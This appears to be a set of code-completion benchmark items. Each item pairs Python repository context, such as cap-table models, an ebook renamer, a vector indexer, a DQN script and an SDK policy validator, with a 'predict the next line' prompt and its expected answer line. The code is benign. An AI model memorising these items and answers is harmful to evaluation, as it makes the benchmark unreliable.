FOUR_YR_NO_CLIFF = "4yr with no Cliff"
FULLY_VESTED = "Fully Vested"
CUSTOM = "Custom" # We're not going to support this via OCF
# Path: CE2OCF/types/models.py
class Stockholder(BaseModel):
id: str
DoubleTrigger: DoubleTriggerTypesEnum
# our answer will appear below the general description entered above. If no additional language is necessary,
# skip this field
DescriptionAssignedTechnology: Optional[str]
# The description should provide clarity regarding exactly what property is being transferred while being neither
# too narrow nor too broad.
BroadDescriptionAssignedTechnology: str
EmailAddress: str
FFPreferredShares: Optional[
int
] = None # If founder preferred is authorized for company AND we want to give this stockholder some,
# how many shares do they get?
PaidWith: PaidWithOptionsEnum
PhoneNumber: str
SingleTrigger: SingleTriggerTypesEnum
Shares: int
SSN: str
Stockholder: str = Field(
default_factory=lambda: uuid.uuid4().__str__()
) # Name of stockholder goes here BUT we're using uuid to be able filter objs by name and have guaranteed
# uniques. Required for tests.
StockholderCity: str
StockholderState: str
StockholderStreet: str
StockholderZip: str
VCD: str
Vesting: VestingTypesEnum
# Path: CE2OCF/ocf/mocks/stockholders.py
import random
import uuid
from faker import Faker
from CE2OCF.ocf.mocks.company import fake_phone_number
from CE2OCF.types.enums import (
DoubleTriggerTypesEnum,
PaidWithOptionsEnum,
SingleTriggerTypesEnum,
VestingTypesEnum,
)
from CE2OCF.types.models import Stockholder
fake = Faker()
def sum_shares(stockholder_list: list[Stockholder]) -> tuple[int, int]:
total_FFPreferredShares = 0
total_Shares = 0
for stockholder in stockholder_list:
if stockholder.FFPreferredShares is not None:
total_FFPreferredShares += stockholder.FFPreferredShares
if stockholder.Shares is not None:
total_Shares += stockholder.Shares # if Shares are floats, replace with `float(stockholder.Shares)`
return total_FFPreferredShares, total_Shares
def mock_stockholder() -> Stockholder:
return Stockholder(
id=uuid.uuid4().__str__(),
| DoubleTrigger=random.choice(list(DoubleTriggerTypesEnum)), |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: Hellohistory/EbookDataRename.py
# Path: model/database_handler.py
def queryDatabaseForFileNames(db_folder_path, folder_path, tableWidget):
try:
db_files = get_files_from_directory(db_folder_path, recursive=True)
db_files = [f for f in db_files if f.endswith('.db')]
files = get_files_from_directory(folder_path, recursive=True)
tableWidget.setRowCount(len(files))
found_ss_codes = set()
for row, file_path in enumerate(files):
QApplication.processEvents()
file_name = os.path.basename(file_path)
match = re.search(r'\d{8}', file_name)
ss_code = match.group() if match else None
if ss_code and ss_code not in found_ss_codes:
for db_file in db_files:
connection = sqlite3.connect(db_file)
title = query_title_from_database(connection, ss_code)
connection.close()
if title != "无此列":
tableWidget.setItem(row, 1, QTableWidgetItem(title))
found_ss_codes.add(ss_code)
break
else:
tableWidget.setItem(row, 1, QTableWidgetItem("无此列"))
else:
message = "已找到记录" if ss_code in found_ss_codes else "无效的 SS_code"
tableWidget.setItem(row, 1, QTableWidgetItem(message))
tableWidget.setItem(row, 0, QTableWidgetItem(file_path))
tableWidget.setItem(row, 2, QTableWidgetItem("待处理"))
except Exception as e:
print("发生错误:", str(e))
# Path: model/file_handler.py
def get_files_from_directory(directory_path, recursive=False):
file_list = []
if recursive:
for root, dirs, files in os.walk(directory_path):
for file in files:
file_list.append(os.path.join(root, file))
else:
file_list = [os.path.join(directory_path, file) for file in os.listdir(directory_path) if
os.path.isfile(os.path.join(directory_path, file))]
return file_list
# Path: model/rename_handler.py
def startRenamingFiles(tableWidget, progressBar, changeExtensionCheckBox, traditionalSimplifiedCheckBox):
total_files = tableWidget.rowCount()
progressBar.setValue(0)
cc = OpenCC('s2t')
for row in range(total_files):
original_file = tableWidget.item(row, 0).text()
new_name = tableWidget.item(row, 1).text()
if traditionalSimplifiedCheckBox.isChecked():
new_name = cc.convert(new_name)
original_extension = os.path.splitext(original_file)[1]
if changeExtensionCheckBox.isChecked() and original_extension.lower() == ".uvz":
new_extension = ".zip"
else:
new_extension = original_extension
new_file = os.path.join(os.path.dirname(original_file), os.path.splitext(new_name)[0] + new_extension)
try:
os.rename(original_file, new_file)
tableWidget.setItem(row, 2, QTableWidgetItem("重命名成功"))
except Exception as e:
tableWidget.setItem(row, 2, QTableWidgetItem(f"错误: {e}"))
progressBar.setValue(int((row + 1) / total_files * 100))
progressBar.setValue(100)
# Path: main.py
import sys
from PyQt5.QtWidgets import (QApplication, QMainWindow, QWidget, QVBoxLayout, QHBoxLayout,
QPushButton, QLineEdit, QProgressBar, QTableWidget,
QRadioButton, QCheckBox, QFileDialog, QTableWidgetItem)
from PyQt5.QtCore import QSize
from opencc import OpenCC
from model.database_handler import queryDatabaseForFileNames
from model.file_handler import get_files_from_directory
from model.rename_handler import startRenamingFiles
class MainGUI(QMainWindow):
def __init__(self):
super().__init__()
self.cc = OpenCC('s2t')
self.original_names = {}
self.initUI()
def applyTraditionalSimplifiedConversion(self):
total_rows = self.tableWidget.rowCount()
for row in range(total_rows):
original_text_item = self.tableWidget.item(row, 1)
if original_text_item:
if self.traditionalSimplifiedCheckBox.isChecked():
if row not in self.original_names:
self.original_names[row] = original_text_item.text()
converted_text = self.cc.convert(self.original_names[row])
self.tableWidget.setItem(row, 1, QTableWidgetItem(converted_text))
else:
if row in self.original_names:
self.tableWidget.setItem(row, 1, QTableWidgetItem(self.original_names[row]))
def initUI(self):
self.setWindowTitle('EbookDataRename V0.0.1')
self.setMinimumSize(QSize(800, 600))
centralWidget = QWidget(self)
self.setCentralWidget(centralWidget)
mainLayout = QVBoxLayout(centralWidget)
self.setupLayout(mainLayout)
self.applyMaterialDesignStyle()
def initiateDatabaseQuery(self):
db_path = self.local_db_lineedit.text()
folder_path = self.targetFolderLineEdit.text()
| queryDatabaseForFileNames(db_path, folder_path, self.tableWidget) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: fleet-ai/code-pilot
# Path: utils/utils.py
def batch(iterable, n=1):
l = len(iterable)
for ndx in range(0, l, n):
yield iterable[ndx : min(ndx + n, l)]
# Path: constants.py
INDEX_NAME = "" # TODO add
# Path: constants.py
INDEX_ENVIRONMENT = "" # TODO add
# Path: constants.py
NAMESPACE = "" # TODO add
# Path: constants.py
PATH_TO_SRC_CODE = "src_code/" # OPTIONAL modify -- must start with src_code/
# Path: code_indexer.py
class CodeIndexer:
src_dir: str
target_chunk_tokens: int
max_chunk_tokens: int
enforce_max_chunk_tokens: bool
token_model: str
code_splitters = {}
hash_cache = {}
index = None
def __init__(
self,
src_dir: str,
target_chunk_tokens: int = 300,
max_chunk_tokens: int = 1000,
enforce_max_chunk_tokens: bool = False,
coalesce: int = 50,
token_model: str = "gpt-4",
):
self.src_dir = src_dir
self.target_chunk_tokens = target_chunk_tokens
self.max_chunk_tokens = max_chunk_tokens
self.enforce_max_chunk_tokens = enforce_max_chunk_tokens
self.coalesce = coalesce
self.token_model = token_model
self._create_index()
self.refresh_nodes()
def add_file(self, file: str):
ext = os.path.splitext(file)[1]
text_splitter = self._get_code_splitter(ext)
with open(file, "r", encoding="utf-8") as f:
text = f.read()
chunks = text_splitter.split_text(text)
chunks = [
{
"id": str(uuid.uuid4()),
"text": chunk,
"file": file.split("/src_code/", 1)[1]
if "/src_code/" in file
else file,
}
for chunk in chunks
]
self.embed_and_upsert_code_chunks(chunks)
def refresh_nodes(self):
files = self._find_files(self.src_dir, EXTENSION_TO_TREE_SITTER_LANGUAGE)
# For each file, split into chunks and index
for file in files:
self.add_file(str(file))
def _find_files(self, path, include_ext={}):
"""
Recursively find all files in a given path.
Parameters:
path (str): The root directory to start searching from.
include_ext (dict): A dictionary of file extensions to include
(keys are extensions including leading period if applicable).
Returns:
list: A list of full file paths for each file found.
"""
# Convert path to an absolute path
path = os.path.abspath(path)
found_files = []
for root, _, files in os.walk(path):
for file in files:
# Check if the file should be excluded based on its extension
file_ext = os.path.splitext(file)[1]
if file_ext in include_ext:
# Construct the full path of the file and append to list
full_path = Path(os.path.join(root, file)).resolve()
found_files.append(full_path)
return set(found_files)
def _get_code_splitter(self, ext) -> CodeSplitter:
if ext not in EXTENSION_TO_TREE_SITTER_LANGUAGE:
raise ValueError(f"Extension {ext} not supported.")
language = EXTENSION_TO_TREE_SITTER_LANGUAGE[ext]
if language not in self.code_splitters:
text_splitter = CodeSplitter(
language=language,
target_chunk_tokens=self.target_chunk_tokens,
max_chunk_tokens=self.max_chunk_tokens,
enforce_max_chunk_tokens=self.enforce_max_chunk_tokens,
coalesce=self.coalesce,
token_model=self.token_model,
)
self.code_splitters[ext] = text_splitter
return self.code_splitters[ext]
def _create_index(self):
pinecone.init(api_key=PINECONE_API_KEY, environment=INDEX_ENVIRONMENT)
pinecone_index = pinecone.Index(INDEX_NAME)
self.index = pinecone_index
return pinecone_index
def embed_and_upsert_code_chunks(self, chunks):
vectors = []
embeddings = embed_code_chunks(
chunks,
model=EMBEDDINGS_MODEL,
token_limit=MAX_CONTEXT_LENGTH_EMBEDDINGS,
)
for chunk, embedding in zip(chunks, embeddings):
metadata = {
"id": chunk["id"],
"text": chunk["text"],
"file": chunk["file"],
"type": "code",
}
vectors.append(
{
"id": str(uuid.uuid4()),
"values": embedding,
"metadata": metadata,
}
)
for vec_batch in batch(vectors, 100):
self.index.upsert(vectors=vec_batch, namespace=NAMESPACE)
print("Finished embedding chunk(s).")
# Path: scripts.py
import os
import argparse
import pinecone
from dotenv import load_dotenv
from context import download_embeddings
from utils.utils import batch
from constants import (
INDEX_NAME,
INDEX_ENVIRONMENT,
NAMESPACE,
PATH_TO_SRC_CODE,
)
from code_indexer import CodeIndexer
load_dotenv()
PINECONE_API_KEY = os.getenv("PINECONE_API_KEY")
pinecone.init(api_key=PINECONE_API_KEY, environment=INDEX_ENVIRONMENT)
index = pinecone.Index(INDEX_NAME)
def read_and_upsert(library_name):
df = download_embeddings(library_name)
def convert_row_to_dict(row):
return {
"id": row["id"],
"values": [float(value) for value in row["dense_embeddings"]],
"sparse_values": dict(row["sparse_values"]),
"metadata": {**dict(row["metadata"]), "type": "documentation"},
}
df["dict"] = df.apply(convert_row_to_dict, axis=1)
vectors = df["dict"].tolist()
vec_batches = list(batch(vectors, 100))
for idx, vec_batch in enumerate(vec_batches):
print(f"Upserting batch {idx}/{len(vec_batches)}...")
index.upsert(vectors=vec_batch, namespace=NAMESPACE)
print("Finished upserting")
def read_and_upsert_source_code():
| _ = CodeIndexer(src_dir=PATH_TO_SRC_CODE) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: bithuanglq/APF_RL
# Path: gym_examples/wrappers/relative_position.py
class RelativePosition(gym.ObservationWrapper):
def __init__(self, env):
super().__init__(env)
self.observation_space = spaces.Box(shape=(2+25*6,), low=-np.inf, high=np.inf)
def observation(self, obs):
return np.concatenate((obs["target"] - obs["agent"], obs["loc_obs"]), axis=0) # (2+25*6,)
# Path: prioritized_memory.py
class Memory: # stored as ( s, a, r, s_ ) in SumTree
e = 0.01
a = 0.6
beta = 0.4
beta_increment_per_sampling = 0.001
def __init__(self, capacity):
self.tree = SumTree(capacity)
self.capacity = capacity
def _get_priority(self, error):
return (np.abs(error) + self.e) ** self.a
def add(self, error, sample):
p = self._get_priority(error)
self.tree.add(p, sample)
def sample(self, n):
batch = []
idxs = []
segment = self.tree.total() / n
priorities = []
self.beta = np.min([1., self.beta + self.beta_increment_per_sampling])
for i in range(n):
a = segment * i
b = segment * (i + 1)
s = random.uniform(a, b)
(idx, p, data) = self.tree.get(s)
priorities.append(p)
batch.append(data)
idxs.append(idx)
sampling_probabilities = priorities / self.tree.total()
is_weight = np.power(self.tree.n_entries * sampling_probabilities, -self.beta)
is_weight /= is_weight.max()
return batch, idxs, is_weight
def update(self, idx, error):
p = self._get_priority(error)
self.tree.update(idx, p)
# Path: DQN_variant.py
import argparse
import os
import random
import time
import gym
import numpy as np
import tensorflow as tf
import tensorlayer as tl
from tqdm import tqdm
from gym_examples.wrappers import RelativePosition
from prioritized_memory import Memory
''' 调试日志
1. 适配版本
https://medium.com/mlearning-ai/how-to-install-tensorflow-2-x-with-cuda-and-cudnn-on-ubuntu-20-04-lts-b73c209d8e88
2. 要用save_npz_dict 保存模型而不是 save_npz; 加载时同理
3. 用 APF 代替部分随机探索效果要好很多
4. 加入了PER: (https://blog.csdn.net/abcdefg90876/article/details/106270925), 也可以只用Original Replay Buffer
5. 超参数参考模块: hyper parameters
'''
'''
GridWorld-v0:
@Action -- 0 right, 1 up, 2 left, 3 down
@Observation -- {[x1, y1], [x2, y2], 25 vector(6,)}, agent_loc, target_loc and surrounding states.
@Info -- distance between agent and target
'''
parser = argparse.ArgumentParser()
parser.add_argument('--mode', help='train or test', default='train')
parser.add_argument(
'--save_path', default='dqn_variants', help='folder to save if mode == train else model path,'
'qnet will be saved once target net update'
)
parser.add_argument('--seed', help='random seed', type=int, default=0)
parser.add_argument('--noisy_scale', type=float, default=1e-2)
parser.add_argument('--disable_double', action='store_false', default=True)
parser.add_argument('--disable_dueling', action='store_false', default=False)
args = parser.parse_args()
if args.mode == 'train':
os.makedirs(args.save_path, exist_ok=True)
random.seed(args.seed)
np.random.seed(args.seed)
tf.random.set_seed(args.seed) # reproducible
noise_scale = args.noisy_scale
double = not args.disable_double
dueling = not args.disable_dueling
env = gym.make('gym_examples/GridWorld-v0', render_mode='human')
| env = RelativePosition(env) # refer to gym_examples/wrappers/relative_position.py, observation space has changed! |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: ehennenfent/live_illustrate
# Path: live_illustrate/util.py
class AsyncThread:
"""Generic thread that has a work queue and a callback to run on the result"""
SLEEP_TIME = 0.25
MAX_ERRORS = 5
def __init__(self, logger_name="AsyncThread") -> None:
self.queue: Queue[t.Any] = Queue()
self._consecutive_errors: int = 0
self.logger = logging.getLogger(logger_name)
@abstractmethod
def work(self, *args) -> t.Any:
raise NotImplementedError()
def start(self, callback) -> None:
while True:
if not self.queue.empty():
try:
callback(self.work(*self.queue.get()))
self._consecutive_errors = 0
except Exception as e:
self._consecutive_errors += 1
self.logger.error(e)
if self._consecutive_errors > self.MAX_ERRORS:
self.logger.critical("Abandoning execution after %d consecutive errors", self.MAX_ERRORS)
exit(-1)
sleep(self.SLEEP_TIME)
def send(self, *args) -> None:
self.queue.put(args)
# Path: live_illustrate/util.py
class Summary(Transcription):
summary: str
@classmethod
def from_transcription(cls, transcription: Transcription, summary: str) -> "Summary":
return cls(transcription.transcription, summary)
# Path: live_illustrate/util.py
class Transcription:
transcription: str
# Path: live_illustrate/util.py
@lru_cache(maxsize=2)
def num_tokens_from_string(string: str, encoding_name: str = "cl100k_base") -> int:
"""Use OpenAI's tokenizer to count the number of tokens"""
encoding = tiktoken.get_encoding(encoding_name)
num_tokens = len(encoding.encode(string))
return num_tokens
# Path: live_illustrate/summarize.py
from datetime import datetime
from openai import OpenAI
from .util import AsyncThread, Summary, Transcription, num_tokens_from_string
SYSTEM_PROMPT = "You are a helpful assistant that describes scenes to an artist who wants to draw them. \
You will be given several lines of dialogue that contain details about the physical surroundings of the characters. \
Your job is to summarize the details of the scene in a bulleted list containing 4-7 bullet points. \
If there is more than one scene described by the dialog, summarize only the most recent one. \
Remember to be concise and not include details that cannot be seen." # Not so good about this last bit, eh?
class TextSummarizer(AsyncThread):
def __init__(self, model: str) -> None:
super().__init__("TextSummarizer")
self.openai_client: OpenAI = OpenAI()
self.model: str = model
def work(self, transcription: Transcription) -> Summary | None:
"""Sends the big buffer of provided text to ChatGPT, returns bullets describing the setting"""
text = transcription.transcription
| if (token_count := num_tokens_from_string(text)) == 0: |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: cyberark/ark-sdk-python
# Path: ark_sdk_python/models/common/ark_protocol_type.py
class ArkProtocolType(str, MultiValueEnum):
SSH = 'ssh', 'SSH'
SCP = 'scp', 'SCP'
SFTP = 'sftp', 'SFTP'
RDP = 'rdp', 'RDP'
CLI = 'cli', 'CLI'
CONSOLE = 'console', 'Console'
HTTPS = 'https', 'HTTPS'
K8S = 'K8S', 'k8s'
DB = 'Database', 'database', 'DATABASE'
# Path: ark_sdk_python/models/common/ark_workspace_type.py
class ArkWorkspaceType(str, MultiValueEnum):
AWS = 'aws', 'AWS', 'Aws'
AZURE = 'azure', 'AZURE', 'Azure'
ONPREM = 'onprem', 'ON-PREMISE', 'OnPrem'
DB = 'db', 'DATABASES', 'Databases'
GCP = 'gcp', 'GCP'
MYSQL = 'mysql', 'MySQL'
MARIADB = 'mariadb', 'MariaDB'
MSSQL = 'mssql', 'MSSQL'
ORACLE = 'oracle', 'Oracle'
POSTGRES = 'postgres', 'Postgres'
FAULT = 'fault', 'FAULT'
UNKNOWN = 'unknown', 'UNKNOWN', 'Unknown'
# Path: ark_sdk_python/models/services/dpa/policies/common/ark_dpa_base_authorization_rule.py
class ArkDPABaseAuthorizationRule(ArkCamelizedModel):
rule_name: str = Field(description='Name of the rule')
user_data: ArkDPAUserData = Field(description='User data related information of the rule')
# Path: ark_sdk_python/models/services/dpa/policies/common/ark_dpa_base_connection_information.py
class ArkDPABaseConnectionInformation(ArkCamelizedModel):
days_of_week: Optional[List[ArkDPADaysOfWeek]] = Field(
description='Days of week this rule is allowed on', default=['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']
)
full_days: Optional[bool] = Field(description='Whether this rule is allowed for the entirety of the week', default=False)
hours_from: Optional[str] = Field(description='From which hours this rule is allowed')
hours_to: Optional[str] = Field(description='To which hours this rule is allowed')
time_zone: Optional[Union[Dict, str]] = Field(description='Timezone in which the hours apply to')
grant_access: conint(gt=0, le=24) = Field(description='For how many hours to grant access in this rule in hours', default=2)
idle_time: Optional[conint(gt=0, le=120)] = Field(
description='How long the session can stay idle until stopped in minutes', default=None
)
# Path: ark_sdk_python/models/services/dpa/policies/vm/ark_dpa_vm_connection_data.py
class ArkDPAVMConnectionMethodData(ArkCamelizedModel):
class ArkDPAVMLocalEphemeralUserConnectionMethodData(ArkDPAVMConnectionMethodData):
class ArkDPAVMRDPLocalEphemeralUserConnectionData(ArkCamelizedModel):
# Path: ark_sdk_python/models/services/dpa/policies/vm/ark_dpa_vm_authorization_rule.py
from pydantic import Field, validator
from ark_sdk_python.models.common import ArkProtocolType
from ark_sdk_python.models.common.ark_workspace_type import ArkWorkspaceType
from ark_sdk_python.models.services.dpa.policies.common.ark_dpa_base_authorization_rule import ArkDPABaseAuthorizationRule
from ark_sdk_python.models.services.dpa.policies.common.ark_dpa_base_connection_information import ArkDPABaseConnectionInformation
from ark_sdk_python.models.services.dpa.policies.vm.ark_dpa_vm_connection_data import ArkDPAVMProvidersConnectionDict
class ArkDPAVMConnectionInformation(ArkDPABaseConnectionInformation):
connect_as: ArkDPAVMProvidersConnectionDict = Field(description='In which fashion the connection is made')
# pylint: disable=no-self-use,no-self-argument
@validator('connect_as')
def validate_connect_as(cls, val):
for k, v in val.items():
| if ArkWorkspaceType(k) not in [ArkWorkspaceType.AWS, ArkWorkspaceType.AZURE, ArkWorkspaceType.GCP, ArkWorkspaceType.ONPREM]: |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: Infineon/pharaoh-dev
# Path: src/pharaoh/templating/second_level/env_filters.py
DEFAULT = object()
def required(value):
def rep(value) -> str:
def or_default(value, default):
def oc_resolve(value: omegaconf.DictConfig):
def oc_get(cfg: omegaconf.DictConfig, key, default=DEFAULT):
def exists(path: str) -> bool:
def to_path(path: str) -> Path:
def hasattr_(obj, name):
def md2html(text):
# Path: src/pharaoh/templating/second_level/env_globals.py
def raise_helper(msg):
def heading(text: str, level: int) -> str:
def rand_id(chars: int | None = None) -> str:
def read_text(file) -> str:
def hrule():
def fglob(pattern: str, root: str = ".") -> list[Path]:
def assert_true(statement: bool, message: str = ""):
# Path: src/pharaoh/templating/second_level/env_tests.py
# Path: src/pharaoh/templating/second_level/util.py
def asset_rel_path_from_build(sphinx_app: PharaohSphinx, template_file: Path, asset: Asset):
asset.copy_to(sphinx_app.assets_dir)
return (
Path(os.path.relpath(sphinx_app.confdir, os.path.dirname(template_file)))
/ sphinx_app.assets_dir.name
/ asset.assetfile.name
).as_posix()
# Path: src/pharaoh/templating/second_level/util.py
def asset_rel_path_from_project(project: PharaohProject, asset: Asset):
return "/" + asset.assetfile.relative_to(project.asset_build_dir.parent).as_posix()
# Path: src/pharaoh/templating/second_level/template_env.py
import copy
import functools
import os
import pprint
import shutil
import uuid
import jinja2
import omegaconf
import pharaoh.project
from functools import partial
from pathlib import Path
from types import ModuleType
from typing import TYPE_CHECKING, Callable
from jinja2_git import GitExtension
from pharaoh.log import log
from pharaoh.util.contextlib_chdir import chdir
from .env_filters import env_filters
from .env_globals import env_globals
from .env_tests import env_tests
from .util import asset_rel_path_from_build, asset_rel_path_from_project
from collections.abc import Iterator
from sphinx.config import Config
from pharaoh.sphinx_app import PharaohSphinx
from pharaoh.plugins.plugin_manager import PM
from __future__ import annotations
if TYPE_CHECKING:
class PharaohFileSystemLoader(jinja2.loaders.FileSystemLoader):
def get_source(self, environment: jinja2.Environment, template: str) -> tuple[str, str, Callable[[], bool]]:
# Overwrite to support absolute filenames as well as relative ones that have to be looked up in the search paths
for searchpath in self.searchpath:
if "<>" in template: # See PharaohTemplateEnv.join_path
parent, template_ = template.rsplit("<>", 1)
template_path = Path(parent) / template_
if template_path.is_absolute() and template_path.exists():
filename = template_path.as_posix()
else:
pieces = jinja2.loaders.split_template_path(template_)
filename = jinja2.loaders.posixpath.join(searchpath, *pieces)
else:
pieces = jinja2.loaders.split_template_path(template)
filename = jinja2.loaders.posixpath.join(searchpath, *pieces)
# Original code starts from here
f = jinja2.loaders.open_if_exists(filename)
if f is None:
continue
try:
contents = f.read().decode(self.encoding)
finally:
f.close()
def up_to_date() -> bool:
return False
# Use normpath to convert Windows altsep to sep.
return contents, os.path.normpath(filename), up_to_date
raise jinja2.TemplateNotFound(template)
class PharaohTemplate(jinja2.Template):
def render(self, *args, **kwargs) -> str:
return super().render(*args, **kwargs)
class PharaohTemplateEnv(jinja2.Environment):
template_class = PharaohTemplate
def __init__(self):
super().__init__(
trim_blocks=True,
lstrip_blocks=True,
keep_trailing_newline=True,
extensions=["jinja2_ansible_filters.AnsibleCoreFiltersExtension"],
)
self.default_context: dict = {
"project": {}, # Project related context
"local": {}, # Discovered content of context files next to the source file
"assets": {}, # Discovered content of asset files registered via register_templating_context function
"config": None, # Content of conf.py (Sphinx Config object)
"user": None, # Content of user given dict "pharaoh_jinja_context" in conf.py
}
self.local_context_file_cache: dict[Path, ModuleType] = {}
self.sphinx_app: PharaohSphinx | None = None
self.globals.update(env_globals)
| self.filters.update(env_filters) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: CorentinJ/transcription-diff
# Path: transcription_diff/text_normalization.py
def normalize_text(raw_text: str, lang_id: str, fault_tolerant=False) -> Tuple[str, SliceMap]:
"""
:param fault_tolerant: issues arising in cleaning operations will not raise an exception if True. The cleaning
and/or mapping may then be incorrect.
:return: the tuple
- clean_text: the cleaned text
- raw2clean: the mapping from raw text to clean text
"""
# Define the ops to apply
text_cleaning_ops = [standardize_characters]
if Language.get(lang_id).language == "en":
text_cleaning_ops.extend([expand_abbreviations, normalize_numbers])
text_cleaning_ops.extend([keep_pronounced_only, collapse_whitespace])
return apply_text_transforms_with_mapping(raw_text, text_cleaning_ops, fault_tolerant)
# Path: transcription_diff/whisper_asr.py
@overload
def whisper_asr(
wav: np.ndarray, sr, *, audio_lang: str=None, whisper_model_size=2, custom_words=[], device="cuda"
) -> Tuple[str, str]: ...
# Path: transcription_diff/text_diff.py
import logging
import numpy as np
from dataclasses import dataclass
from pathlib import Path
from typing import List, Iterable, overload, Union
from minineedle import needle
from transcription_diff.text_normalization import normalize_text
from transcription_diff.whisper_asr import whisper_asr
from colorama import Fore as colors
@dataclass
class TextDiffRegion:
reference_text: str
compared_text: str
pronunciation_match: bool
def clean_text_diff(ref_text: str, compared: str) -> List[TextDiffRegion]:
alignment = needle.NeedlemanWunsch(ref_text.split(" "), compared.split(" "))
alignment.align()
# Arrange
regions = []
for ref_word, compared_word in zip(*alignment.get_aligned_sequences()):
regions.append(TextDiffRegion(
ref_word if isinstance(ref_word, str) else "",
compared_word if isinstance(compared_word, str) else "",
pronunciation_match=(ref_word == compared_word)
))
# Re-add the spaces between words, and prefer to add them on identical regions rather than non-identical ones
for text_attr in ("reference_text", "compared_text"):
last_word_region = None
for region in regions:
if not getattr(region, text_attr):
continue
if last_word_region:
if last_word_region.pronunciation_match:
setattr(last_word_region, text_attr, getattr(last_word_region, text_attr) + " ")
else:
setattr(region, text_attr, " " + getattr(region, text_attr))
last_word_region = region
# Compress
new_regions = []
for region in regions:
if new_regions and (new_regions[-1].pronunciation_match == region.pronunciation_match):
new_regions[-1].reference_text += region.reference_text
new_regions[-1].compared_text += region.compared_text
else:
new_regions.append(region)
return new_regions
def text_diff(
reference_texts: Iterable[str], compared_texts: Iterable[str], lang_id: str
) -> List[List[TextDiffRegion]]:
raw_refs, raw_comps = list(reference_texts), list(compared_texts)
# Normalize text down to characters that influence pronunciation only
clean_refs, raw2clean_refs = zip(*[normalize_text(raw_ref, lang_id) for raw_ref in raw_refs])
clean_comps, raw2clean_comps = zip(*[normalize_text(raw_comp, lang_id) for raw_comp in raw_comps])
# Align clean texts and isolate errors
text_diffs = [clean_text_diff(clean_ref, clean_comp) for clean_ref, clean_comp in zip(clean_refs, clean_comps)]
# Bring the regions up to the unnormalized text space
for raw_ref, raw2clean_ref, raw_comp, raw2clean_comp, clean_diff in zip(
raw_refs, raw2clean_refs, raw_comps, raw2clean_comps, text_diffs
):
clean2raw_ref = raw2clean_ref.inverse()
clean2raw_comp = raw2clean_comp.inverse()
clean_ref_pos, clean_comp_pos = 0, 0
raw_ref_pos, raw_comp_pos = 0, 0
for region in clean_diff:
# Use slicemaps to figure out which parts of the unnormalized text this region corresponds to
clean_ref_sli = slice(clean_ref_pos, clean_ref_pos + len(region.reference_text))
clean_comp_sli = slice(clean_comp_pos, clean_comp_pos + len(region.compared_text))
if region is not clean_diff[-1]:
raw_ref_sli = slice(raw_ref_pos, max(clean2raw_ref[clean_ref_sli].stop, raw_ref_pos))
raw_comp_sli = slice(raw_comp_pos, max(clean2raw_comp[clean_comp_sli].stop, raw_comp_pos))
else:
# Ensure we span the entirety of the unnormalized text, slicemaps are not guaranteed to be surjective
# Typical example: a final punctuation that is erased in text normalization.
raw_ref_sli = slice(raw_ref_pos, len(raw_ref))
raw_comp_sli = slice(raw_comp_pos, len(raw_comp))
# Modify the region in place with the unnormalized text
region.reference_text = raw_ref[raw_ref_sli]
region.compared_text = raw_comp[raw_comp_sli]
# Update the positions
clean_ref_pos = clean_ref_sli.stop
clean_comp_pos = clean_comp_sli.stop
raw_ref_pos = raw_ref_sli.stop
raw_comp_pos = raw_comp_sli.stop
return text_diffs
@overload
def transcription_diff(
text: str, wav: np.ndarray, sr, *, audio_lang: str=None, whisper_model_size=2, custom_words=[], device="cuda"
) -> List[TextDiffRegion]: ...
@overload
def transcription_diff(
texts: List[str], wavs: Iterable[np.ndarray], sr, *, audio_lang: str=None, whisper_model_size=2, custom_words=[],
device="cuda"
) -> List[List[TextDiffRegion]]: ...
@overload
def transcription_diff(
text: str, fpath: Union[str, Path], *, audio_lang: str=None, whisper_model_size=2, custom_words=[], device="cuda"
) -> List[TextDiffRegion]: ...
@overload
def transcription_diff(
texts: List[str], fpaths: Iterable[Union[str, Path]], *, audio_lang: str=None, whisper_model_size=2,
custom_words=[], device="cuda"
) -> List[List[TextDiffRegion]]: ...
def transcription_diff(
*args, lang_id: str=None, whisper_model_size=2, custom_words=[], device="cuda"
) -> Union[List[TextDiffRegion], List[List[TextDiffRegion]]]:
# TODO: doc
# Arg parsing
texts, args = args[0], args[1:]
if single := isinstance(texts, str):
texts = [texts]
# Perform ASR
| asr_texts, lang_id = whisper_asr( |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: AI4HealthUOL/ECG-MIMIC
# Path: src/clinical_ts/basic_conv1d.py
class AdaptiveConcatPool1d(nn.Module):
"Layer that concats `AdaptiveAvgPool1d` and `AdaptiveMaxPool1d`."
def __init__(self, sz=None):
"Output will be 2*sz or 2 if sz is None"
super().__init__()
sz = sz or 1
self.ap,self.mp = nn.AdaptiveAvgPool1d(sz), nn.AdaptiveMaxPool1d(sz)
def forward(self, x): return torch.cat([self.mp(x), self.ap(x)], 1)
# Path: src/clinical_ts/basic_conv1d.py
def create_head1d(nf, nc, lin_ftrs=None, ps=0.5, bn:bool=True, act="relu", concat_pooling=True):
"Model head that takes `nf` features, runs through `lin_ftrs`, and about `nc` classes; added bn and act here"
lin_ftrs = [2*nf if concat_pooling else nf, nc] if lin_ftrs is None else [2*nf if concat_pooling else nf] + lin_ftrs + [nc] #was [nf, 512,nc]
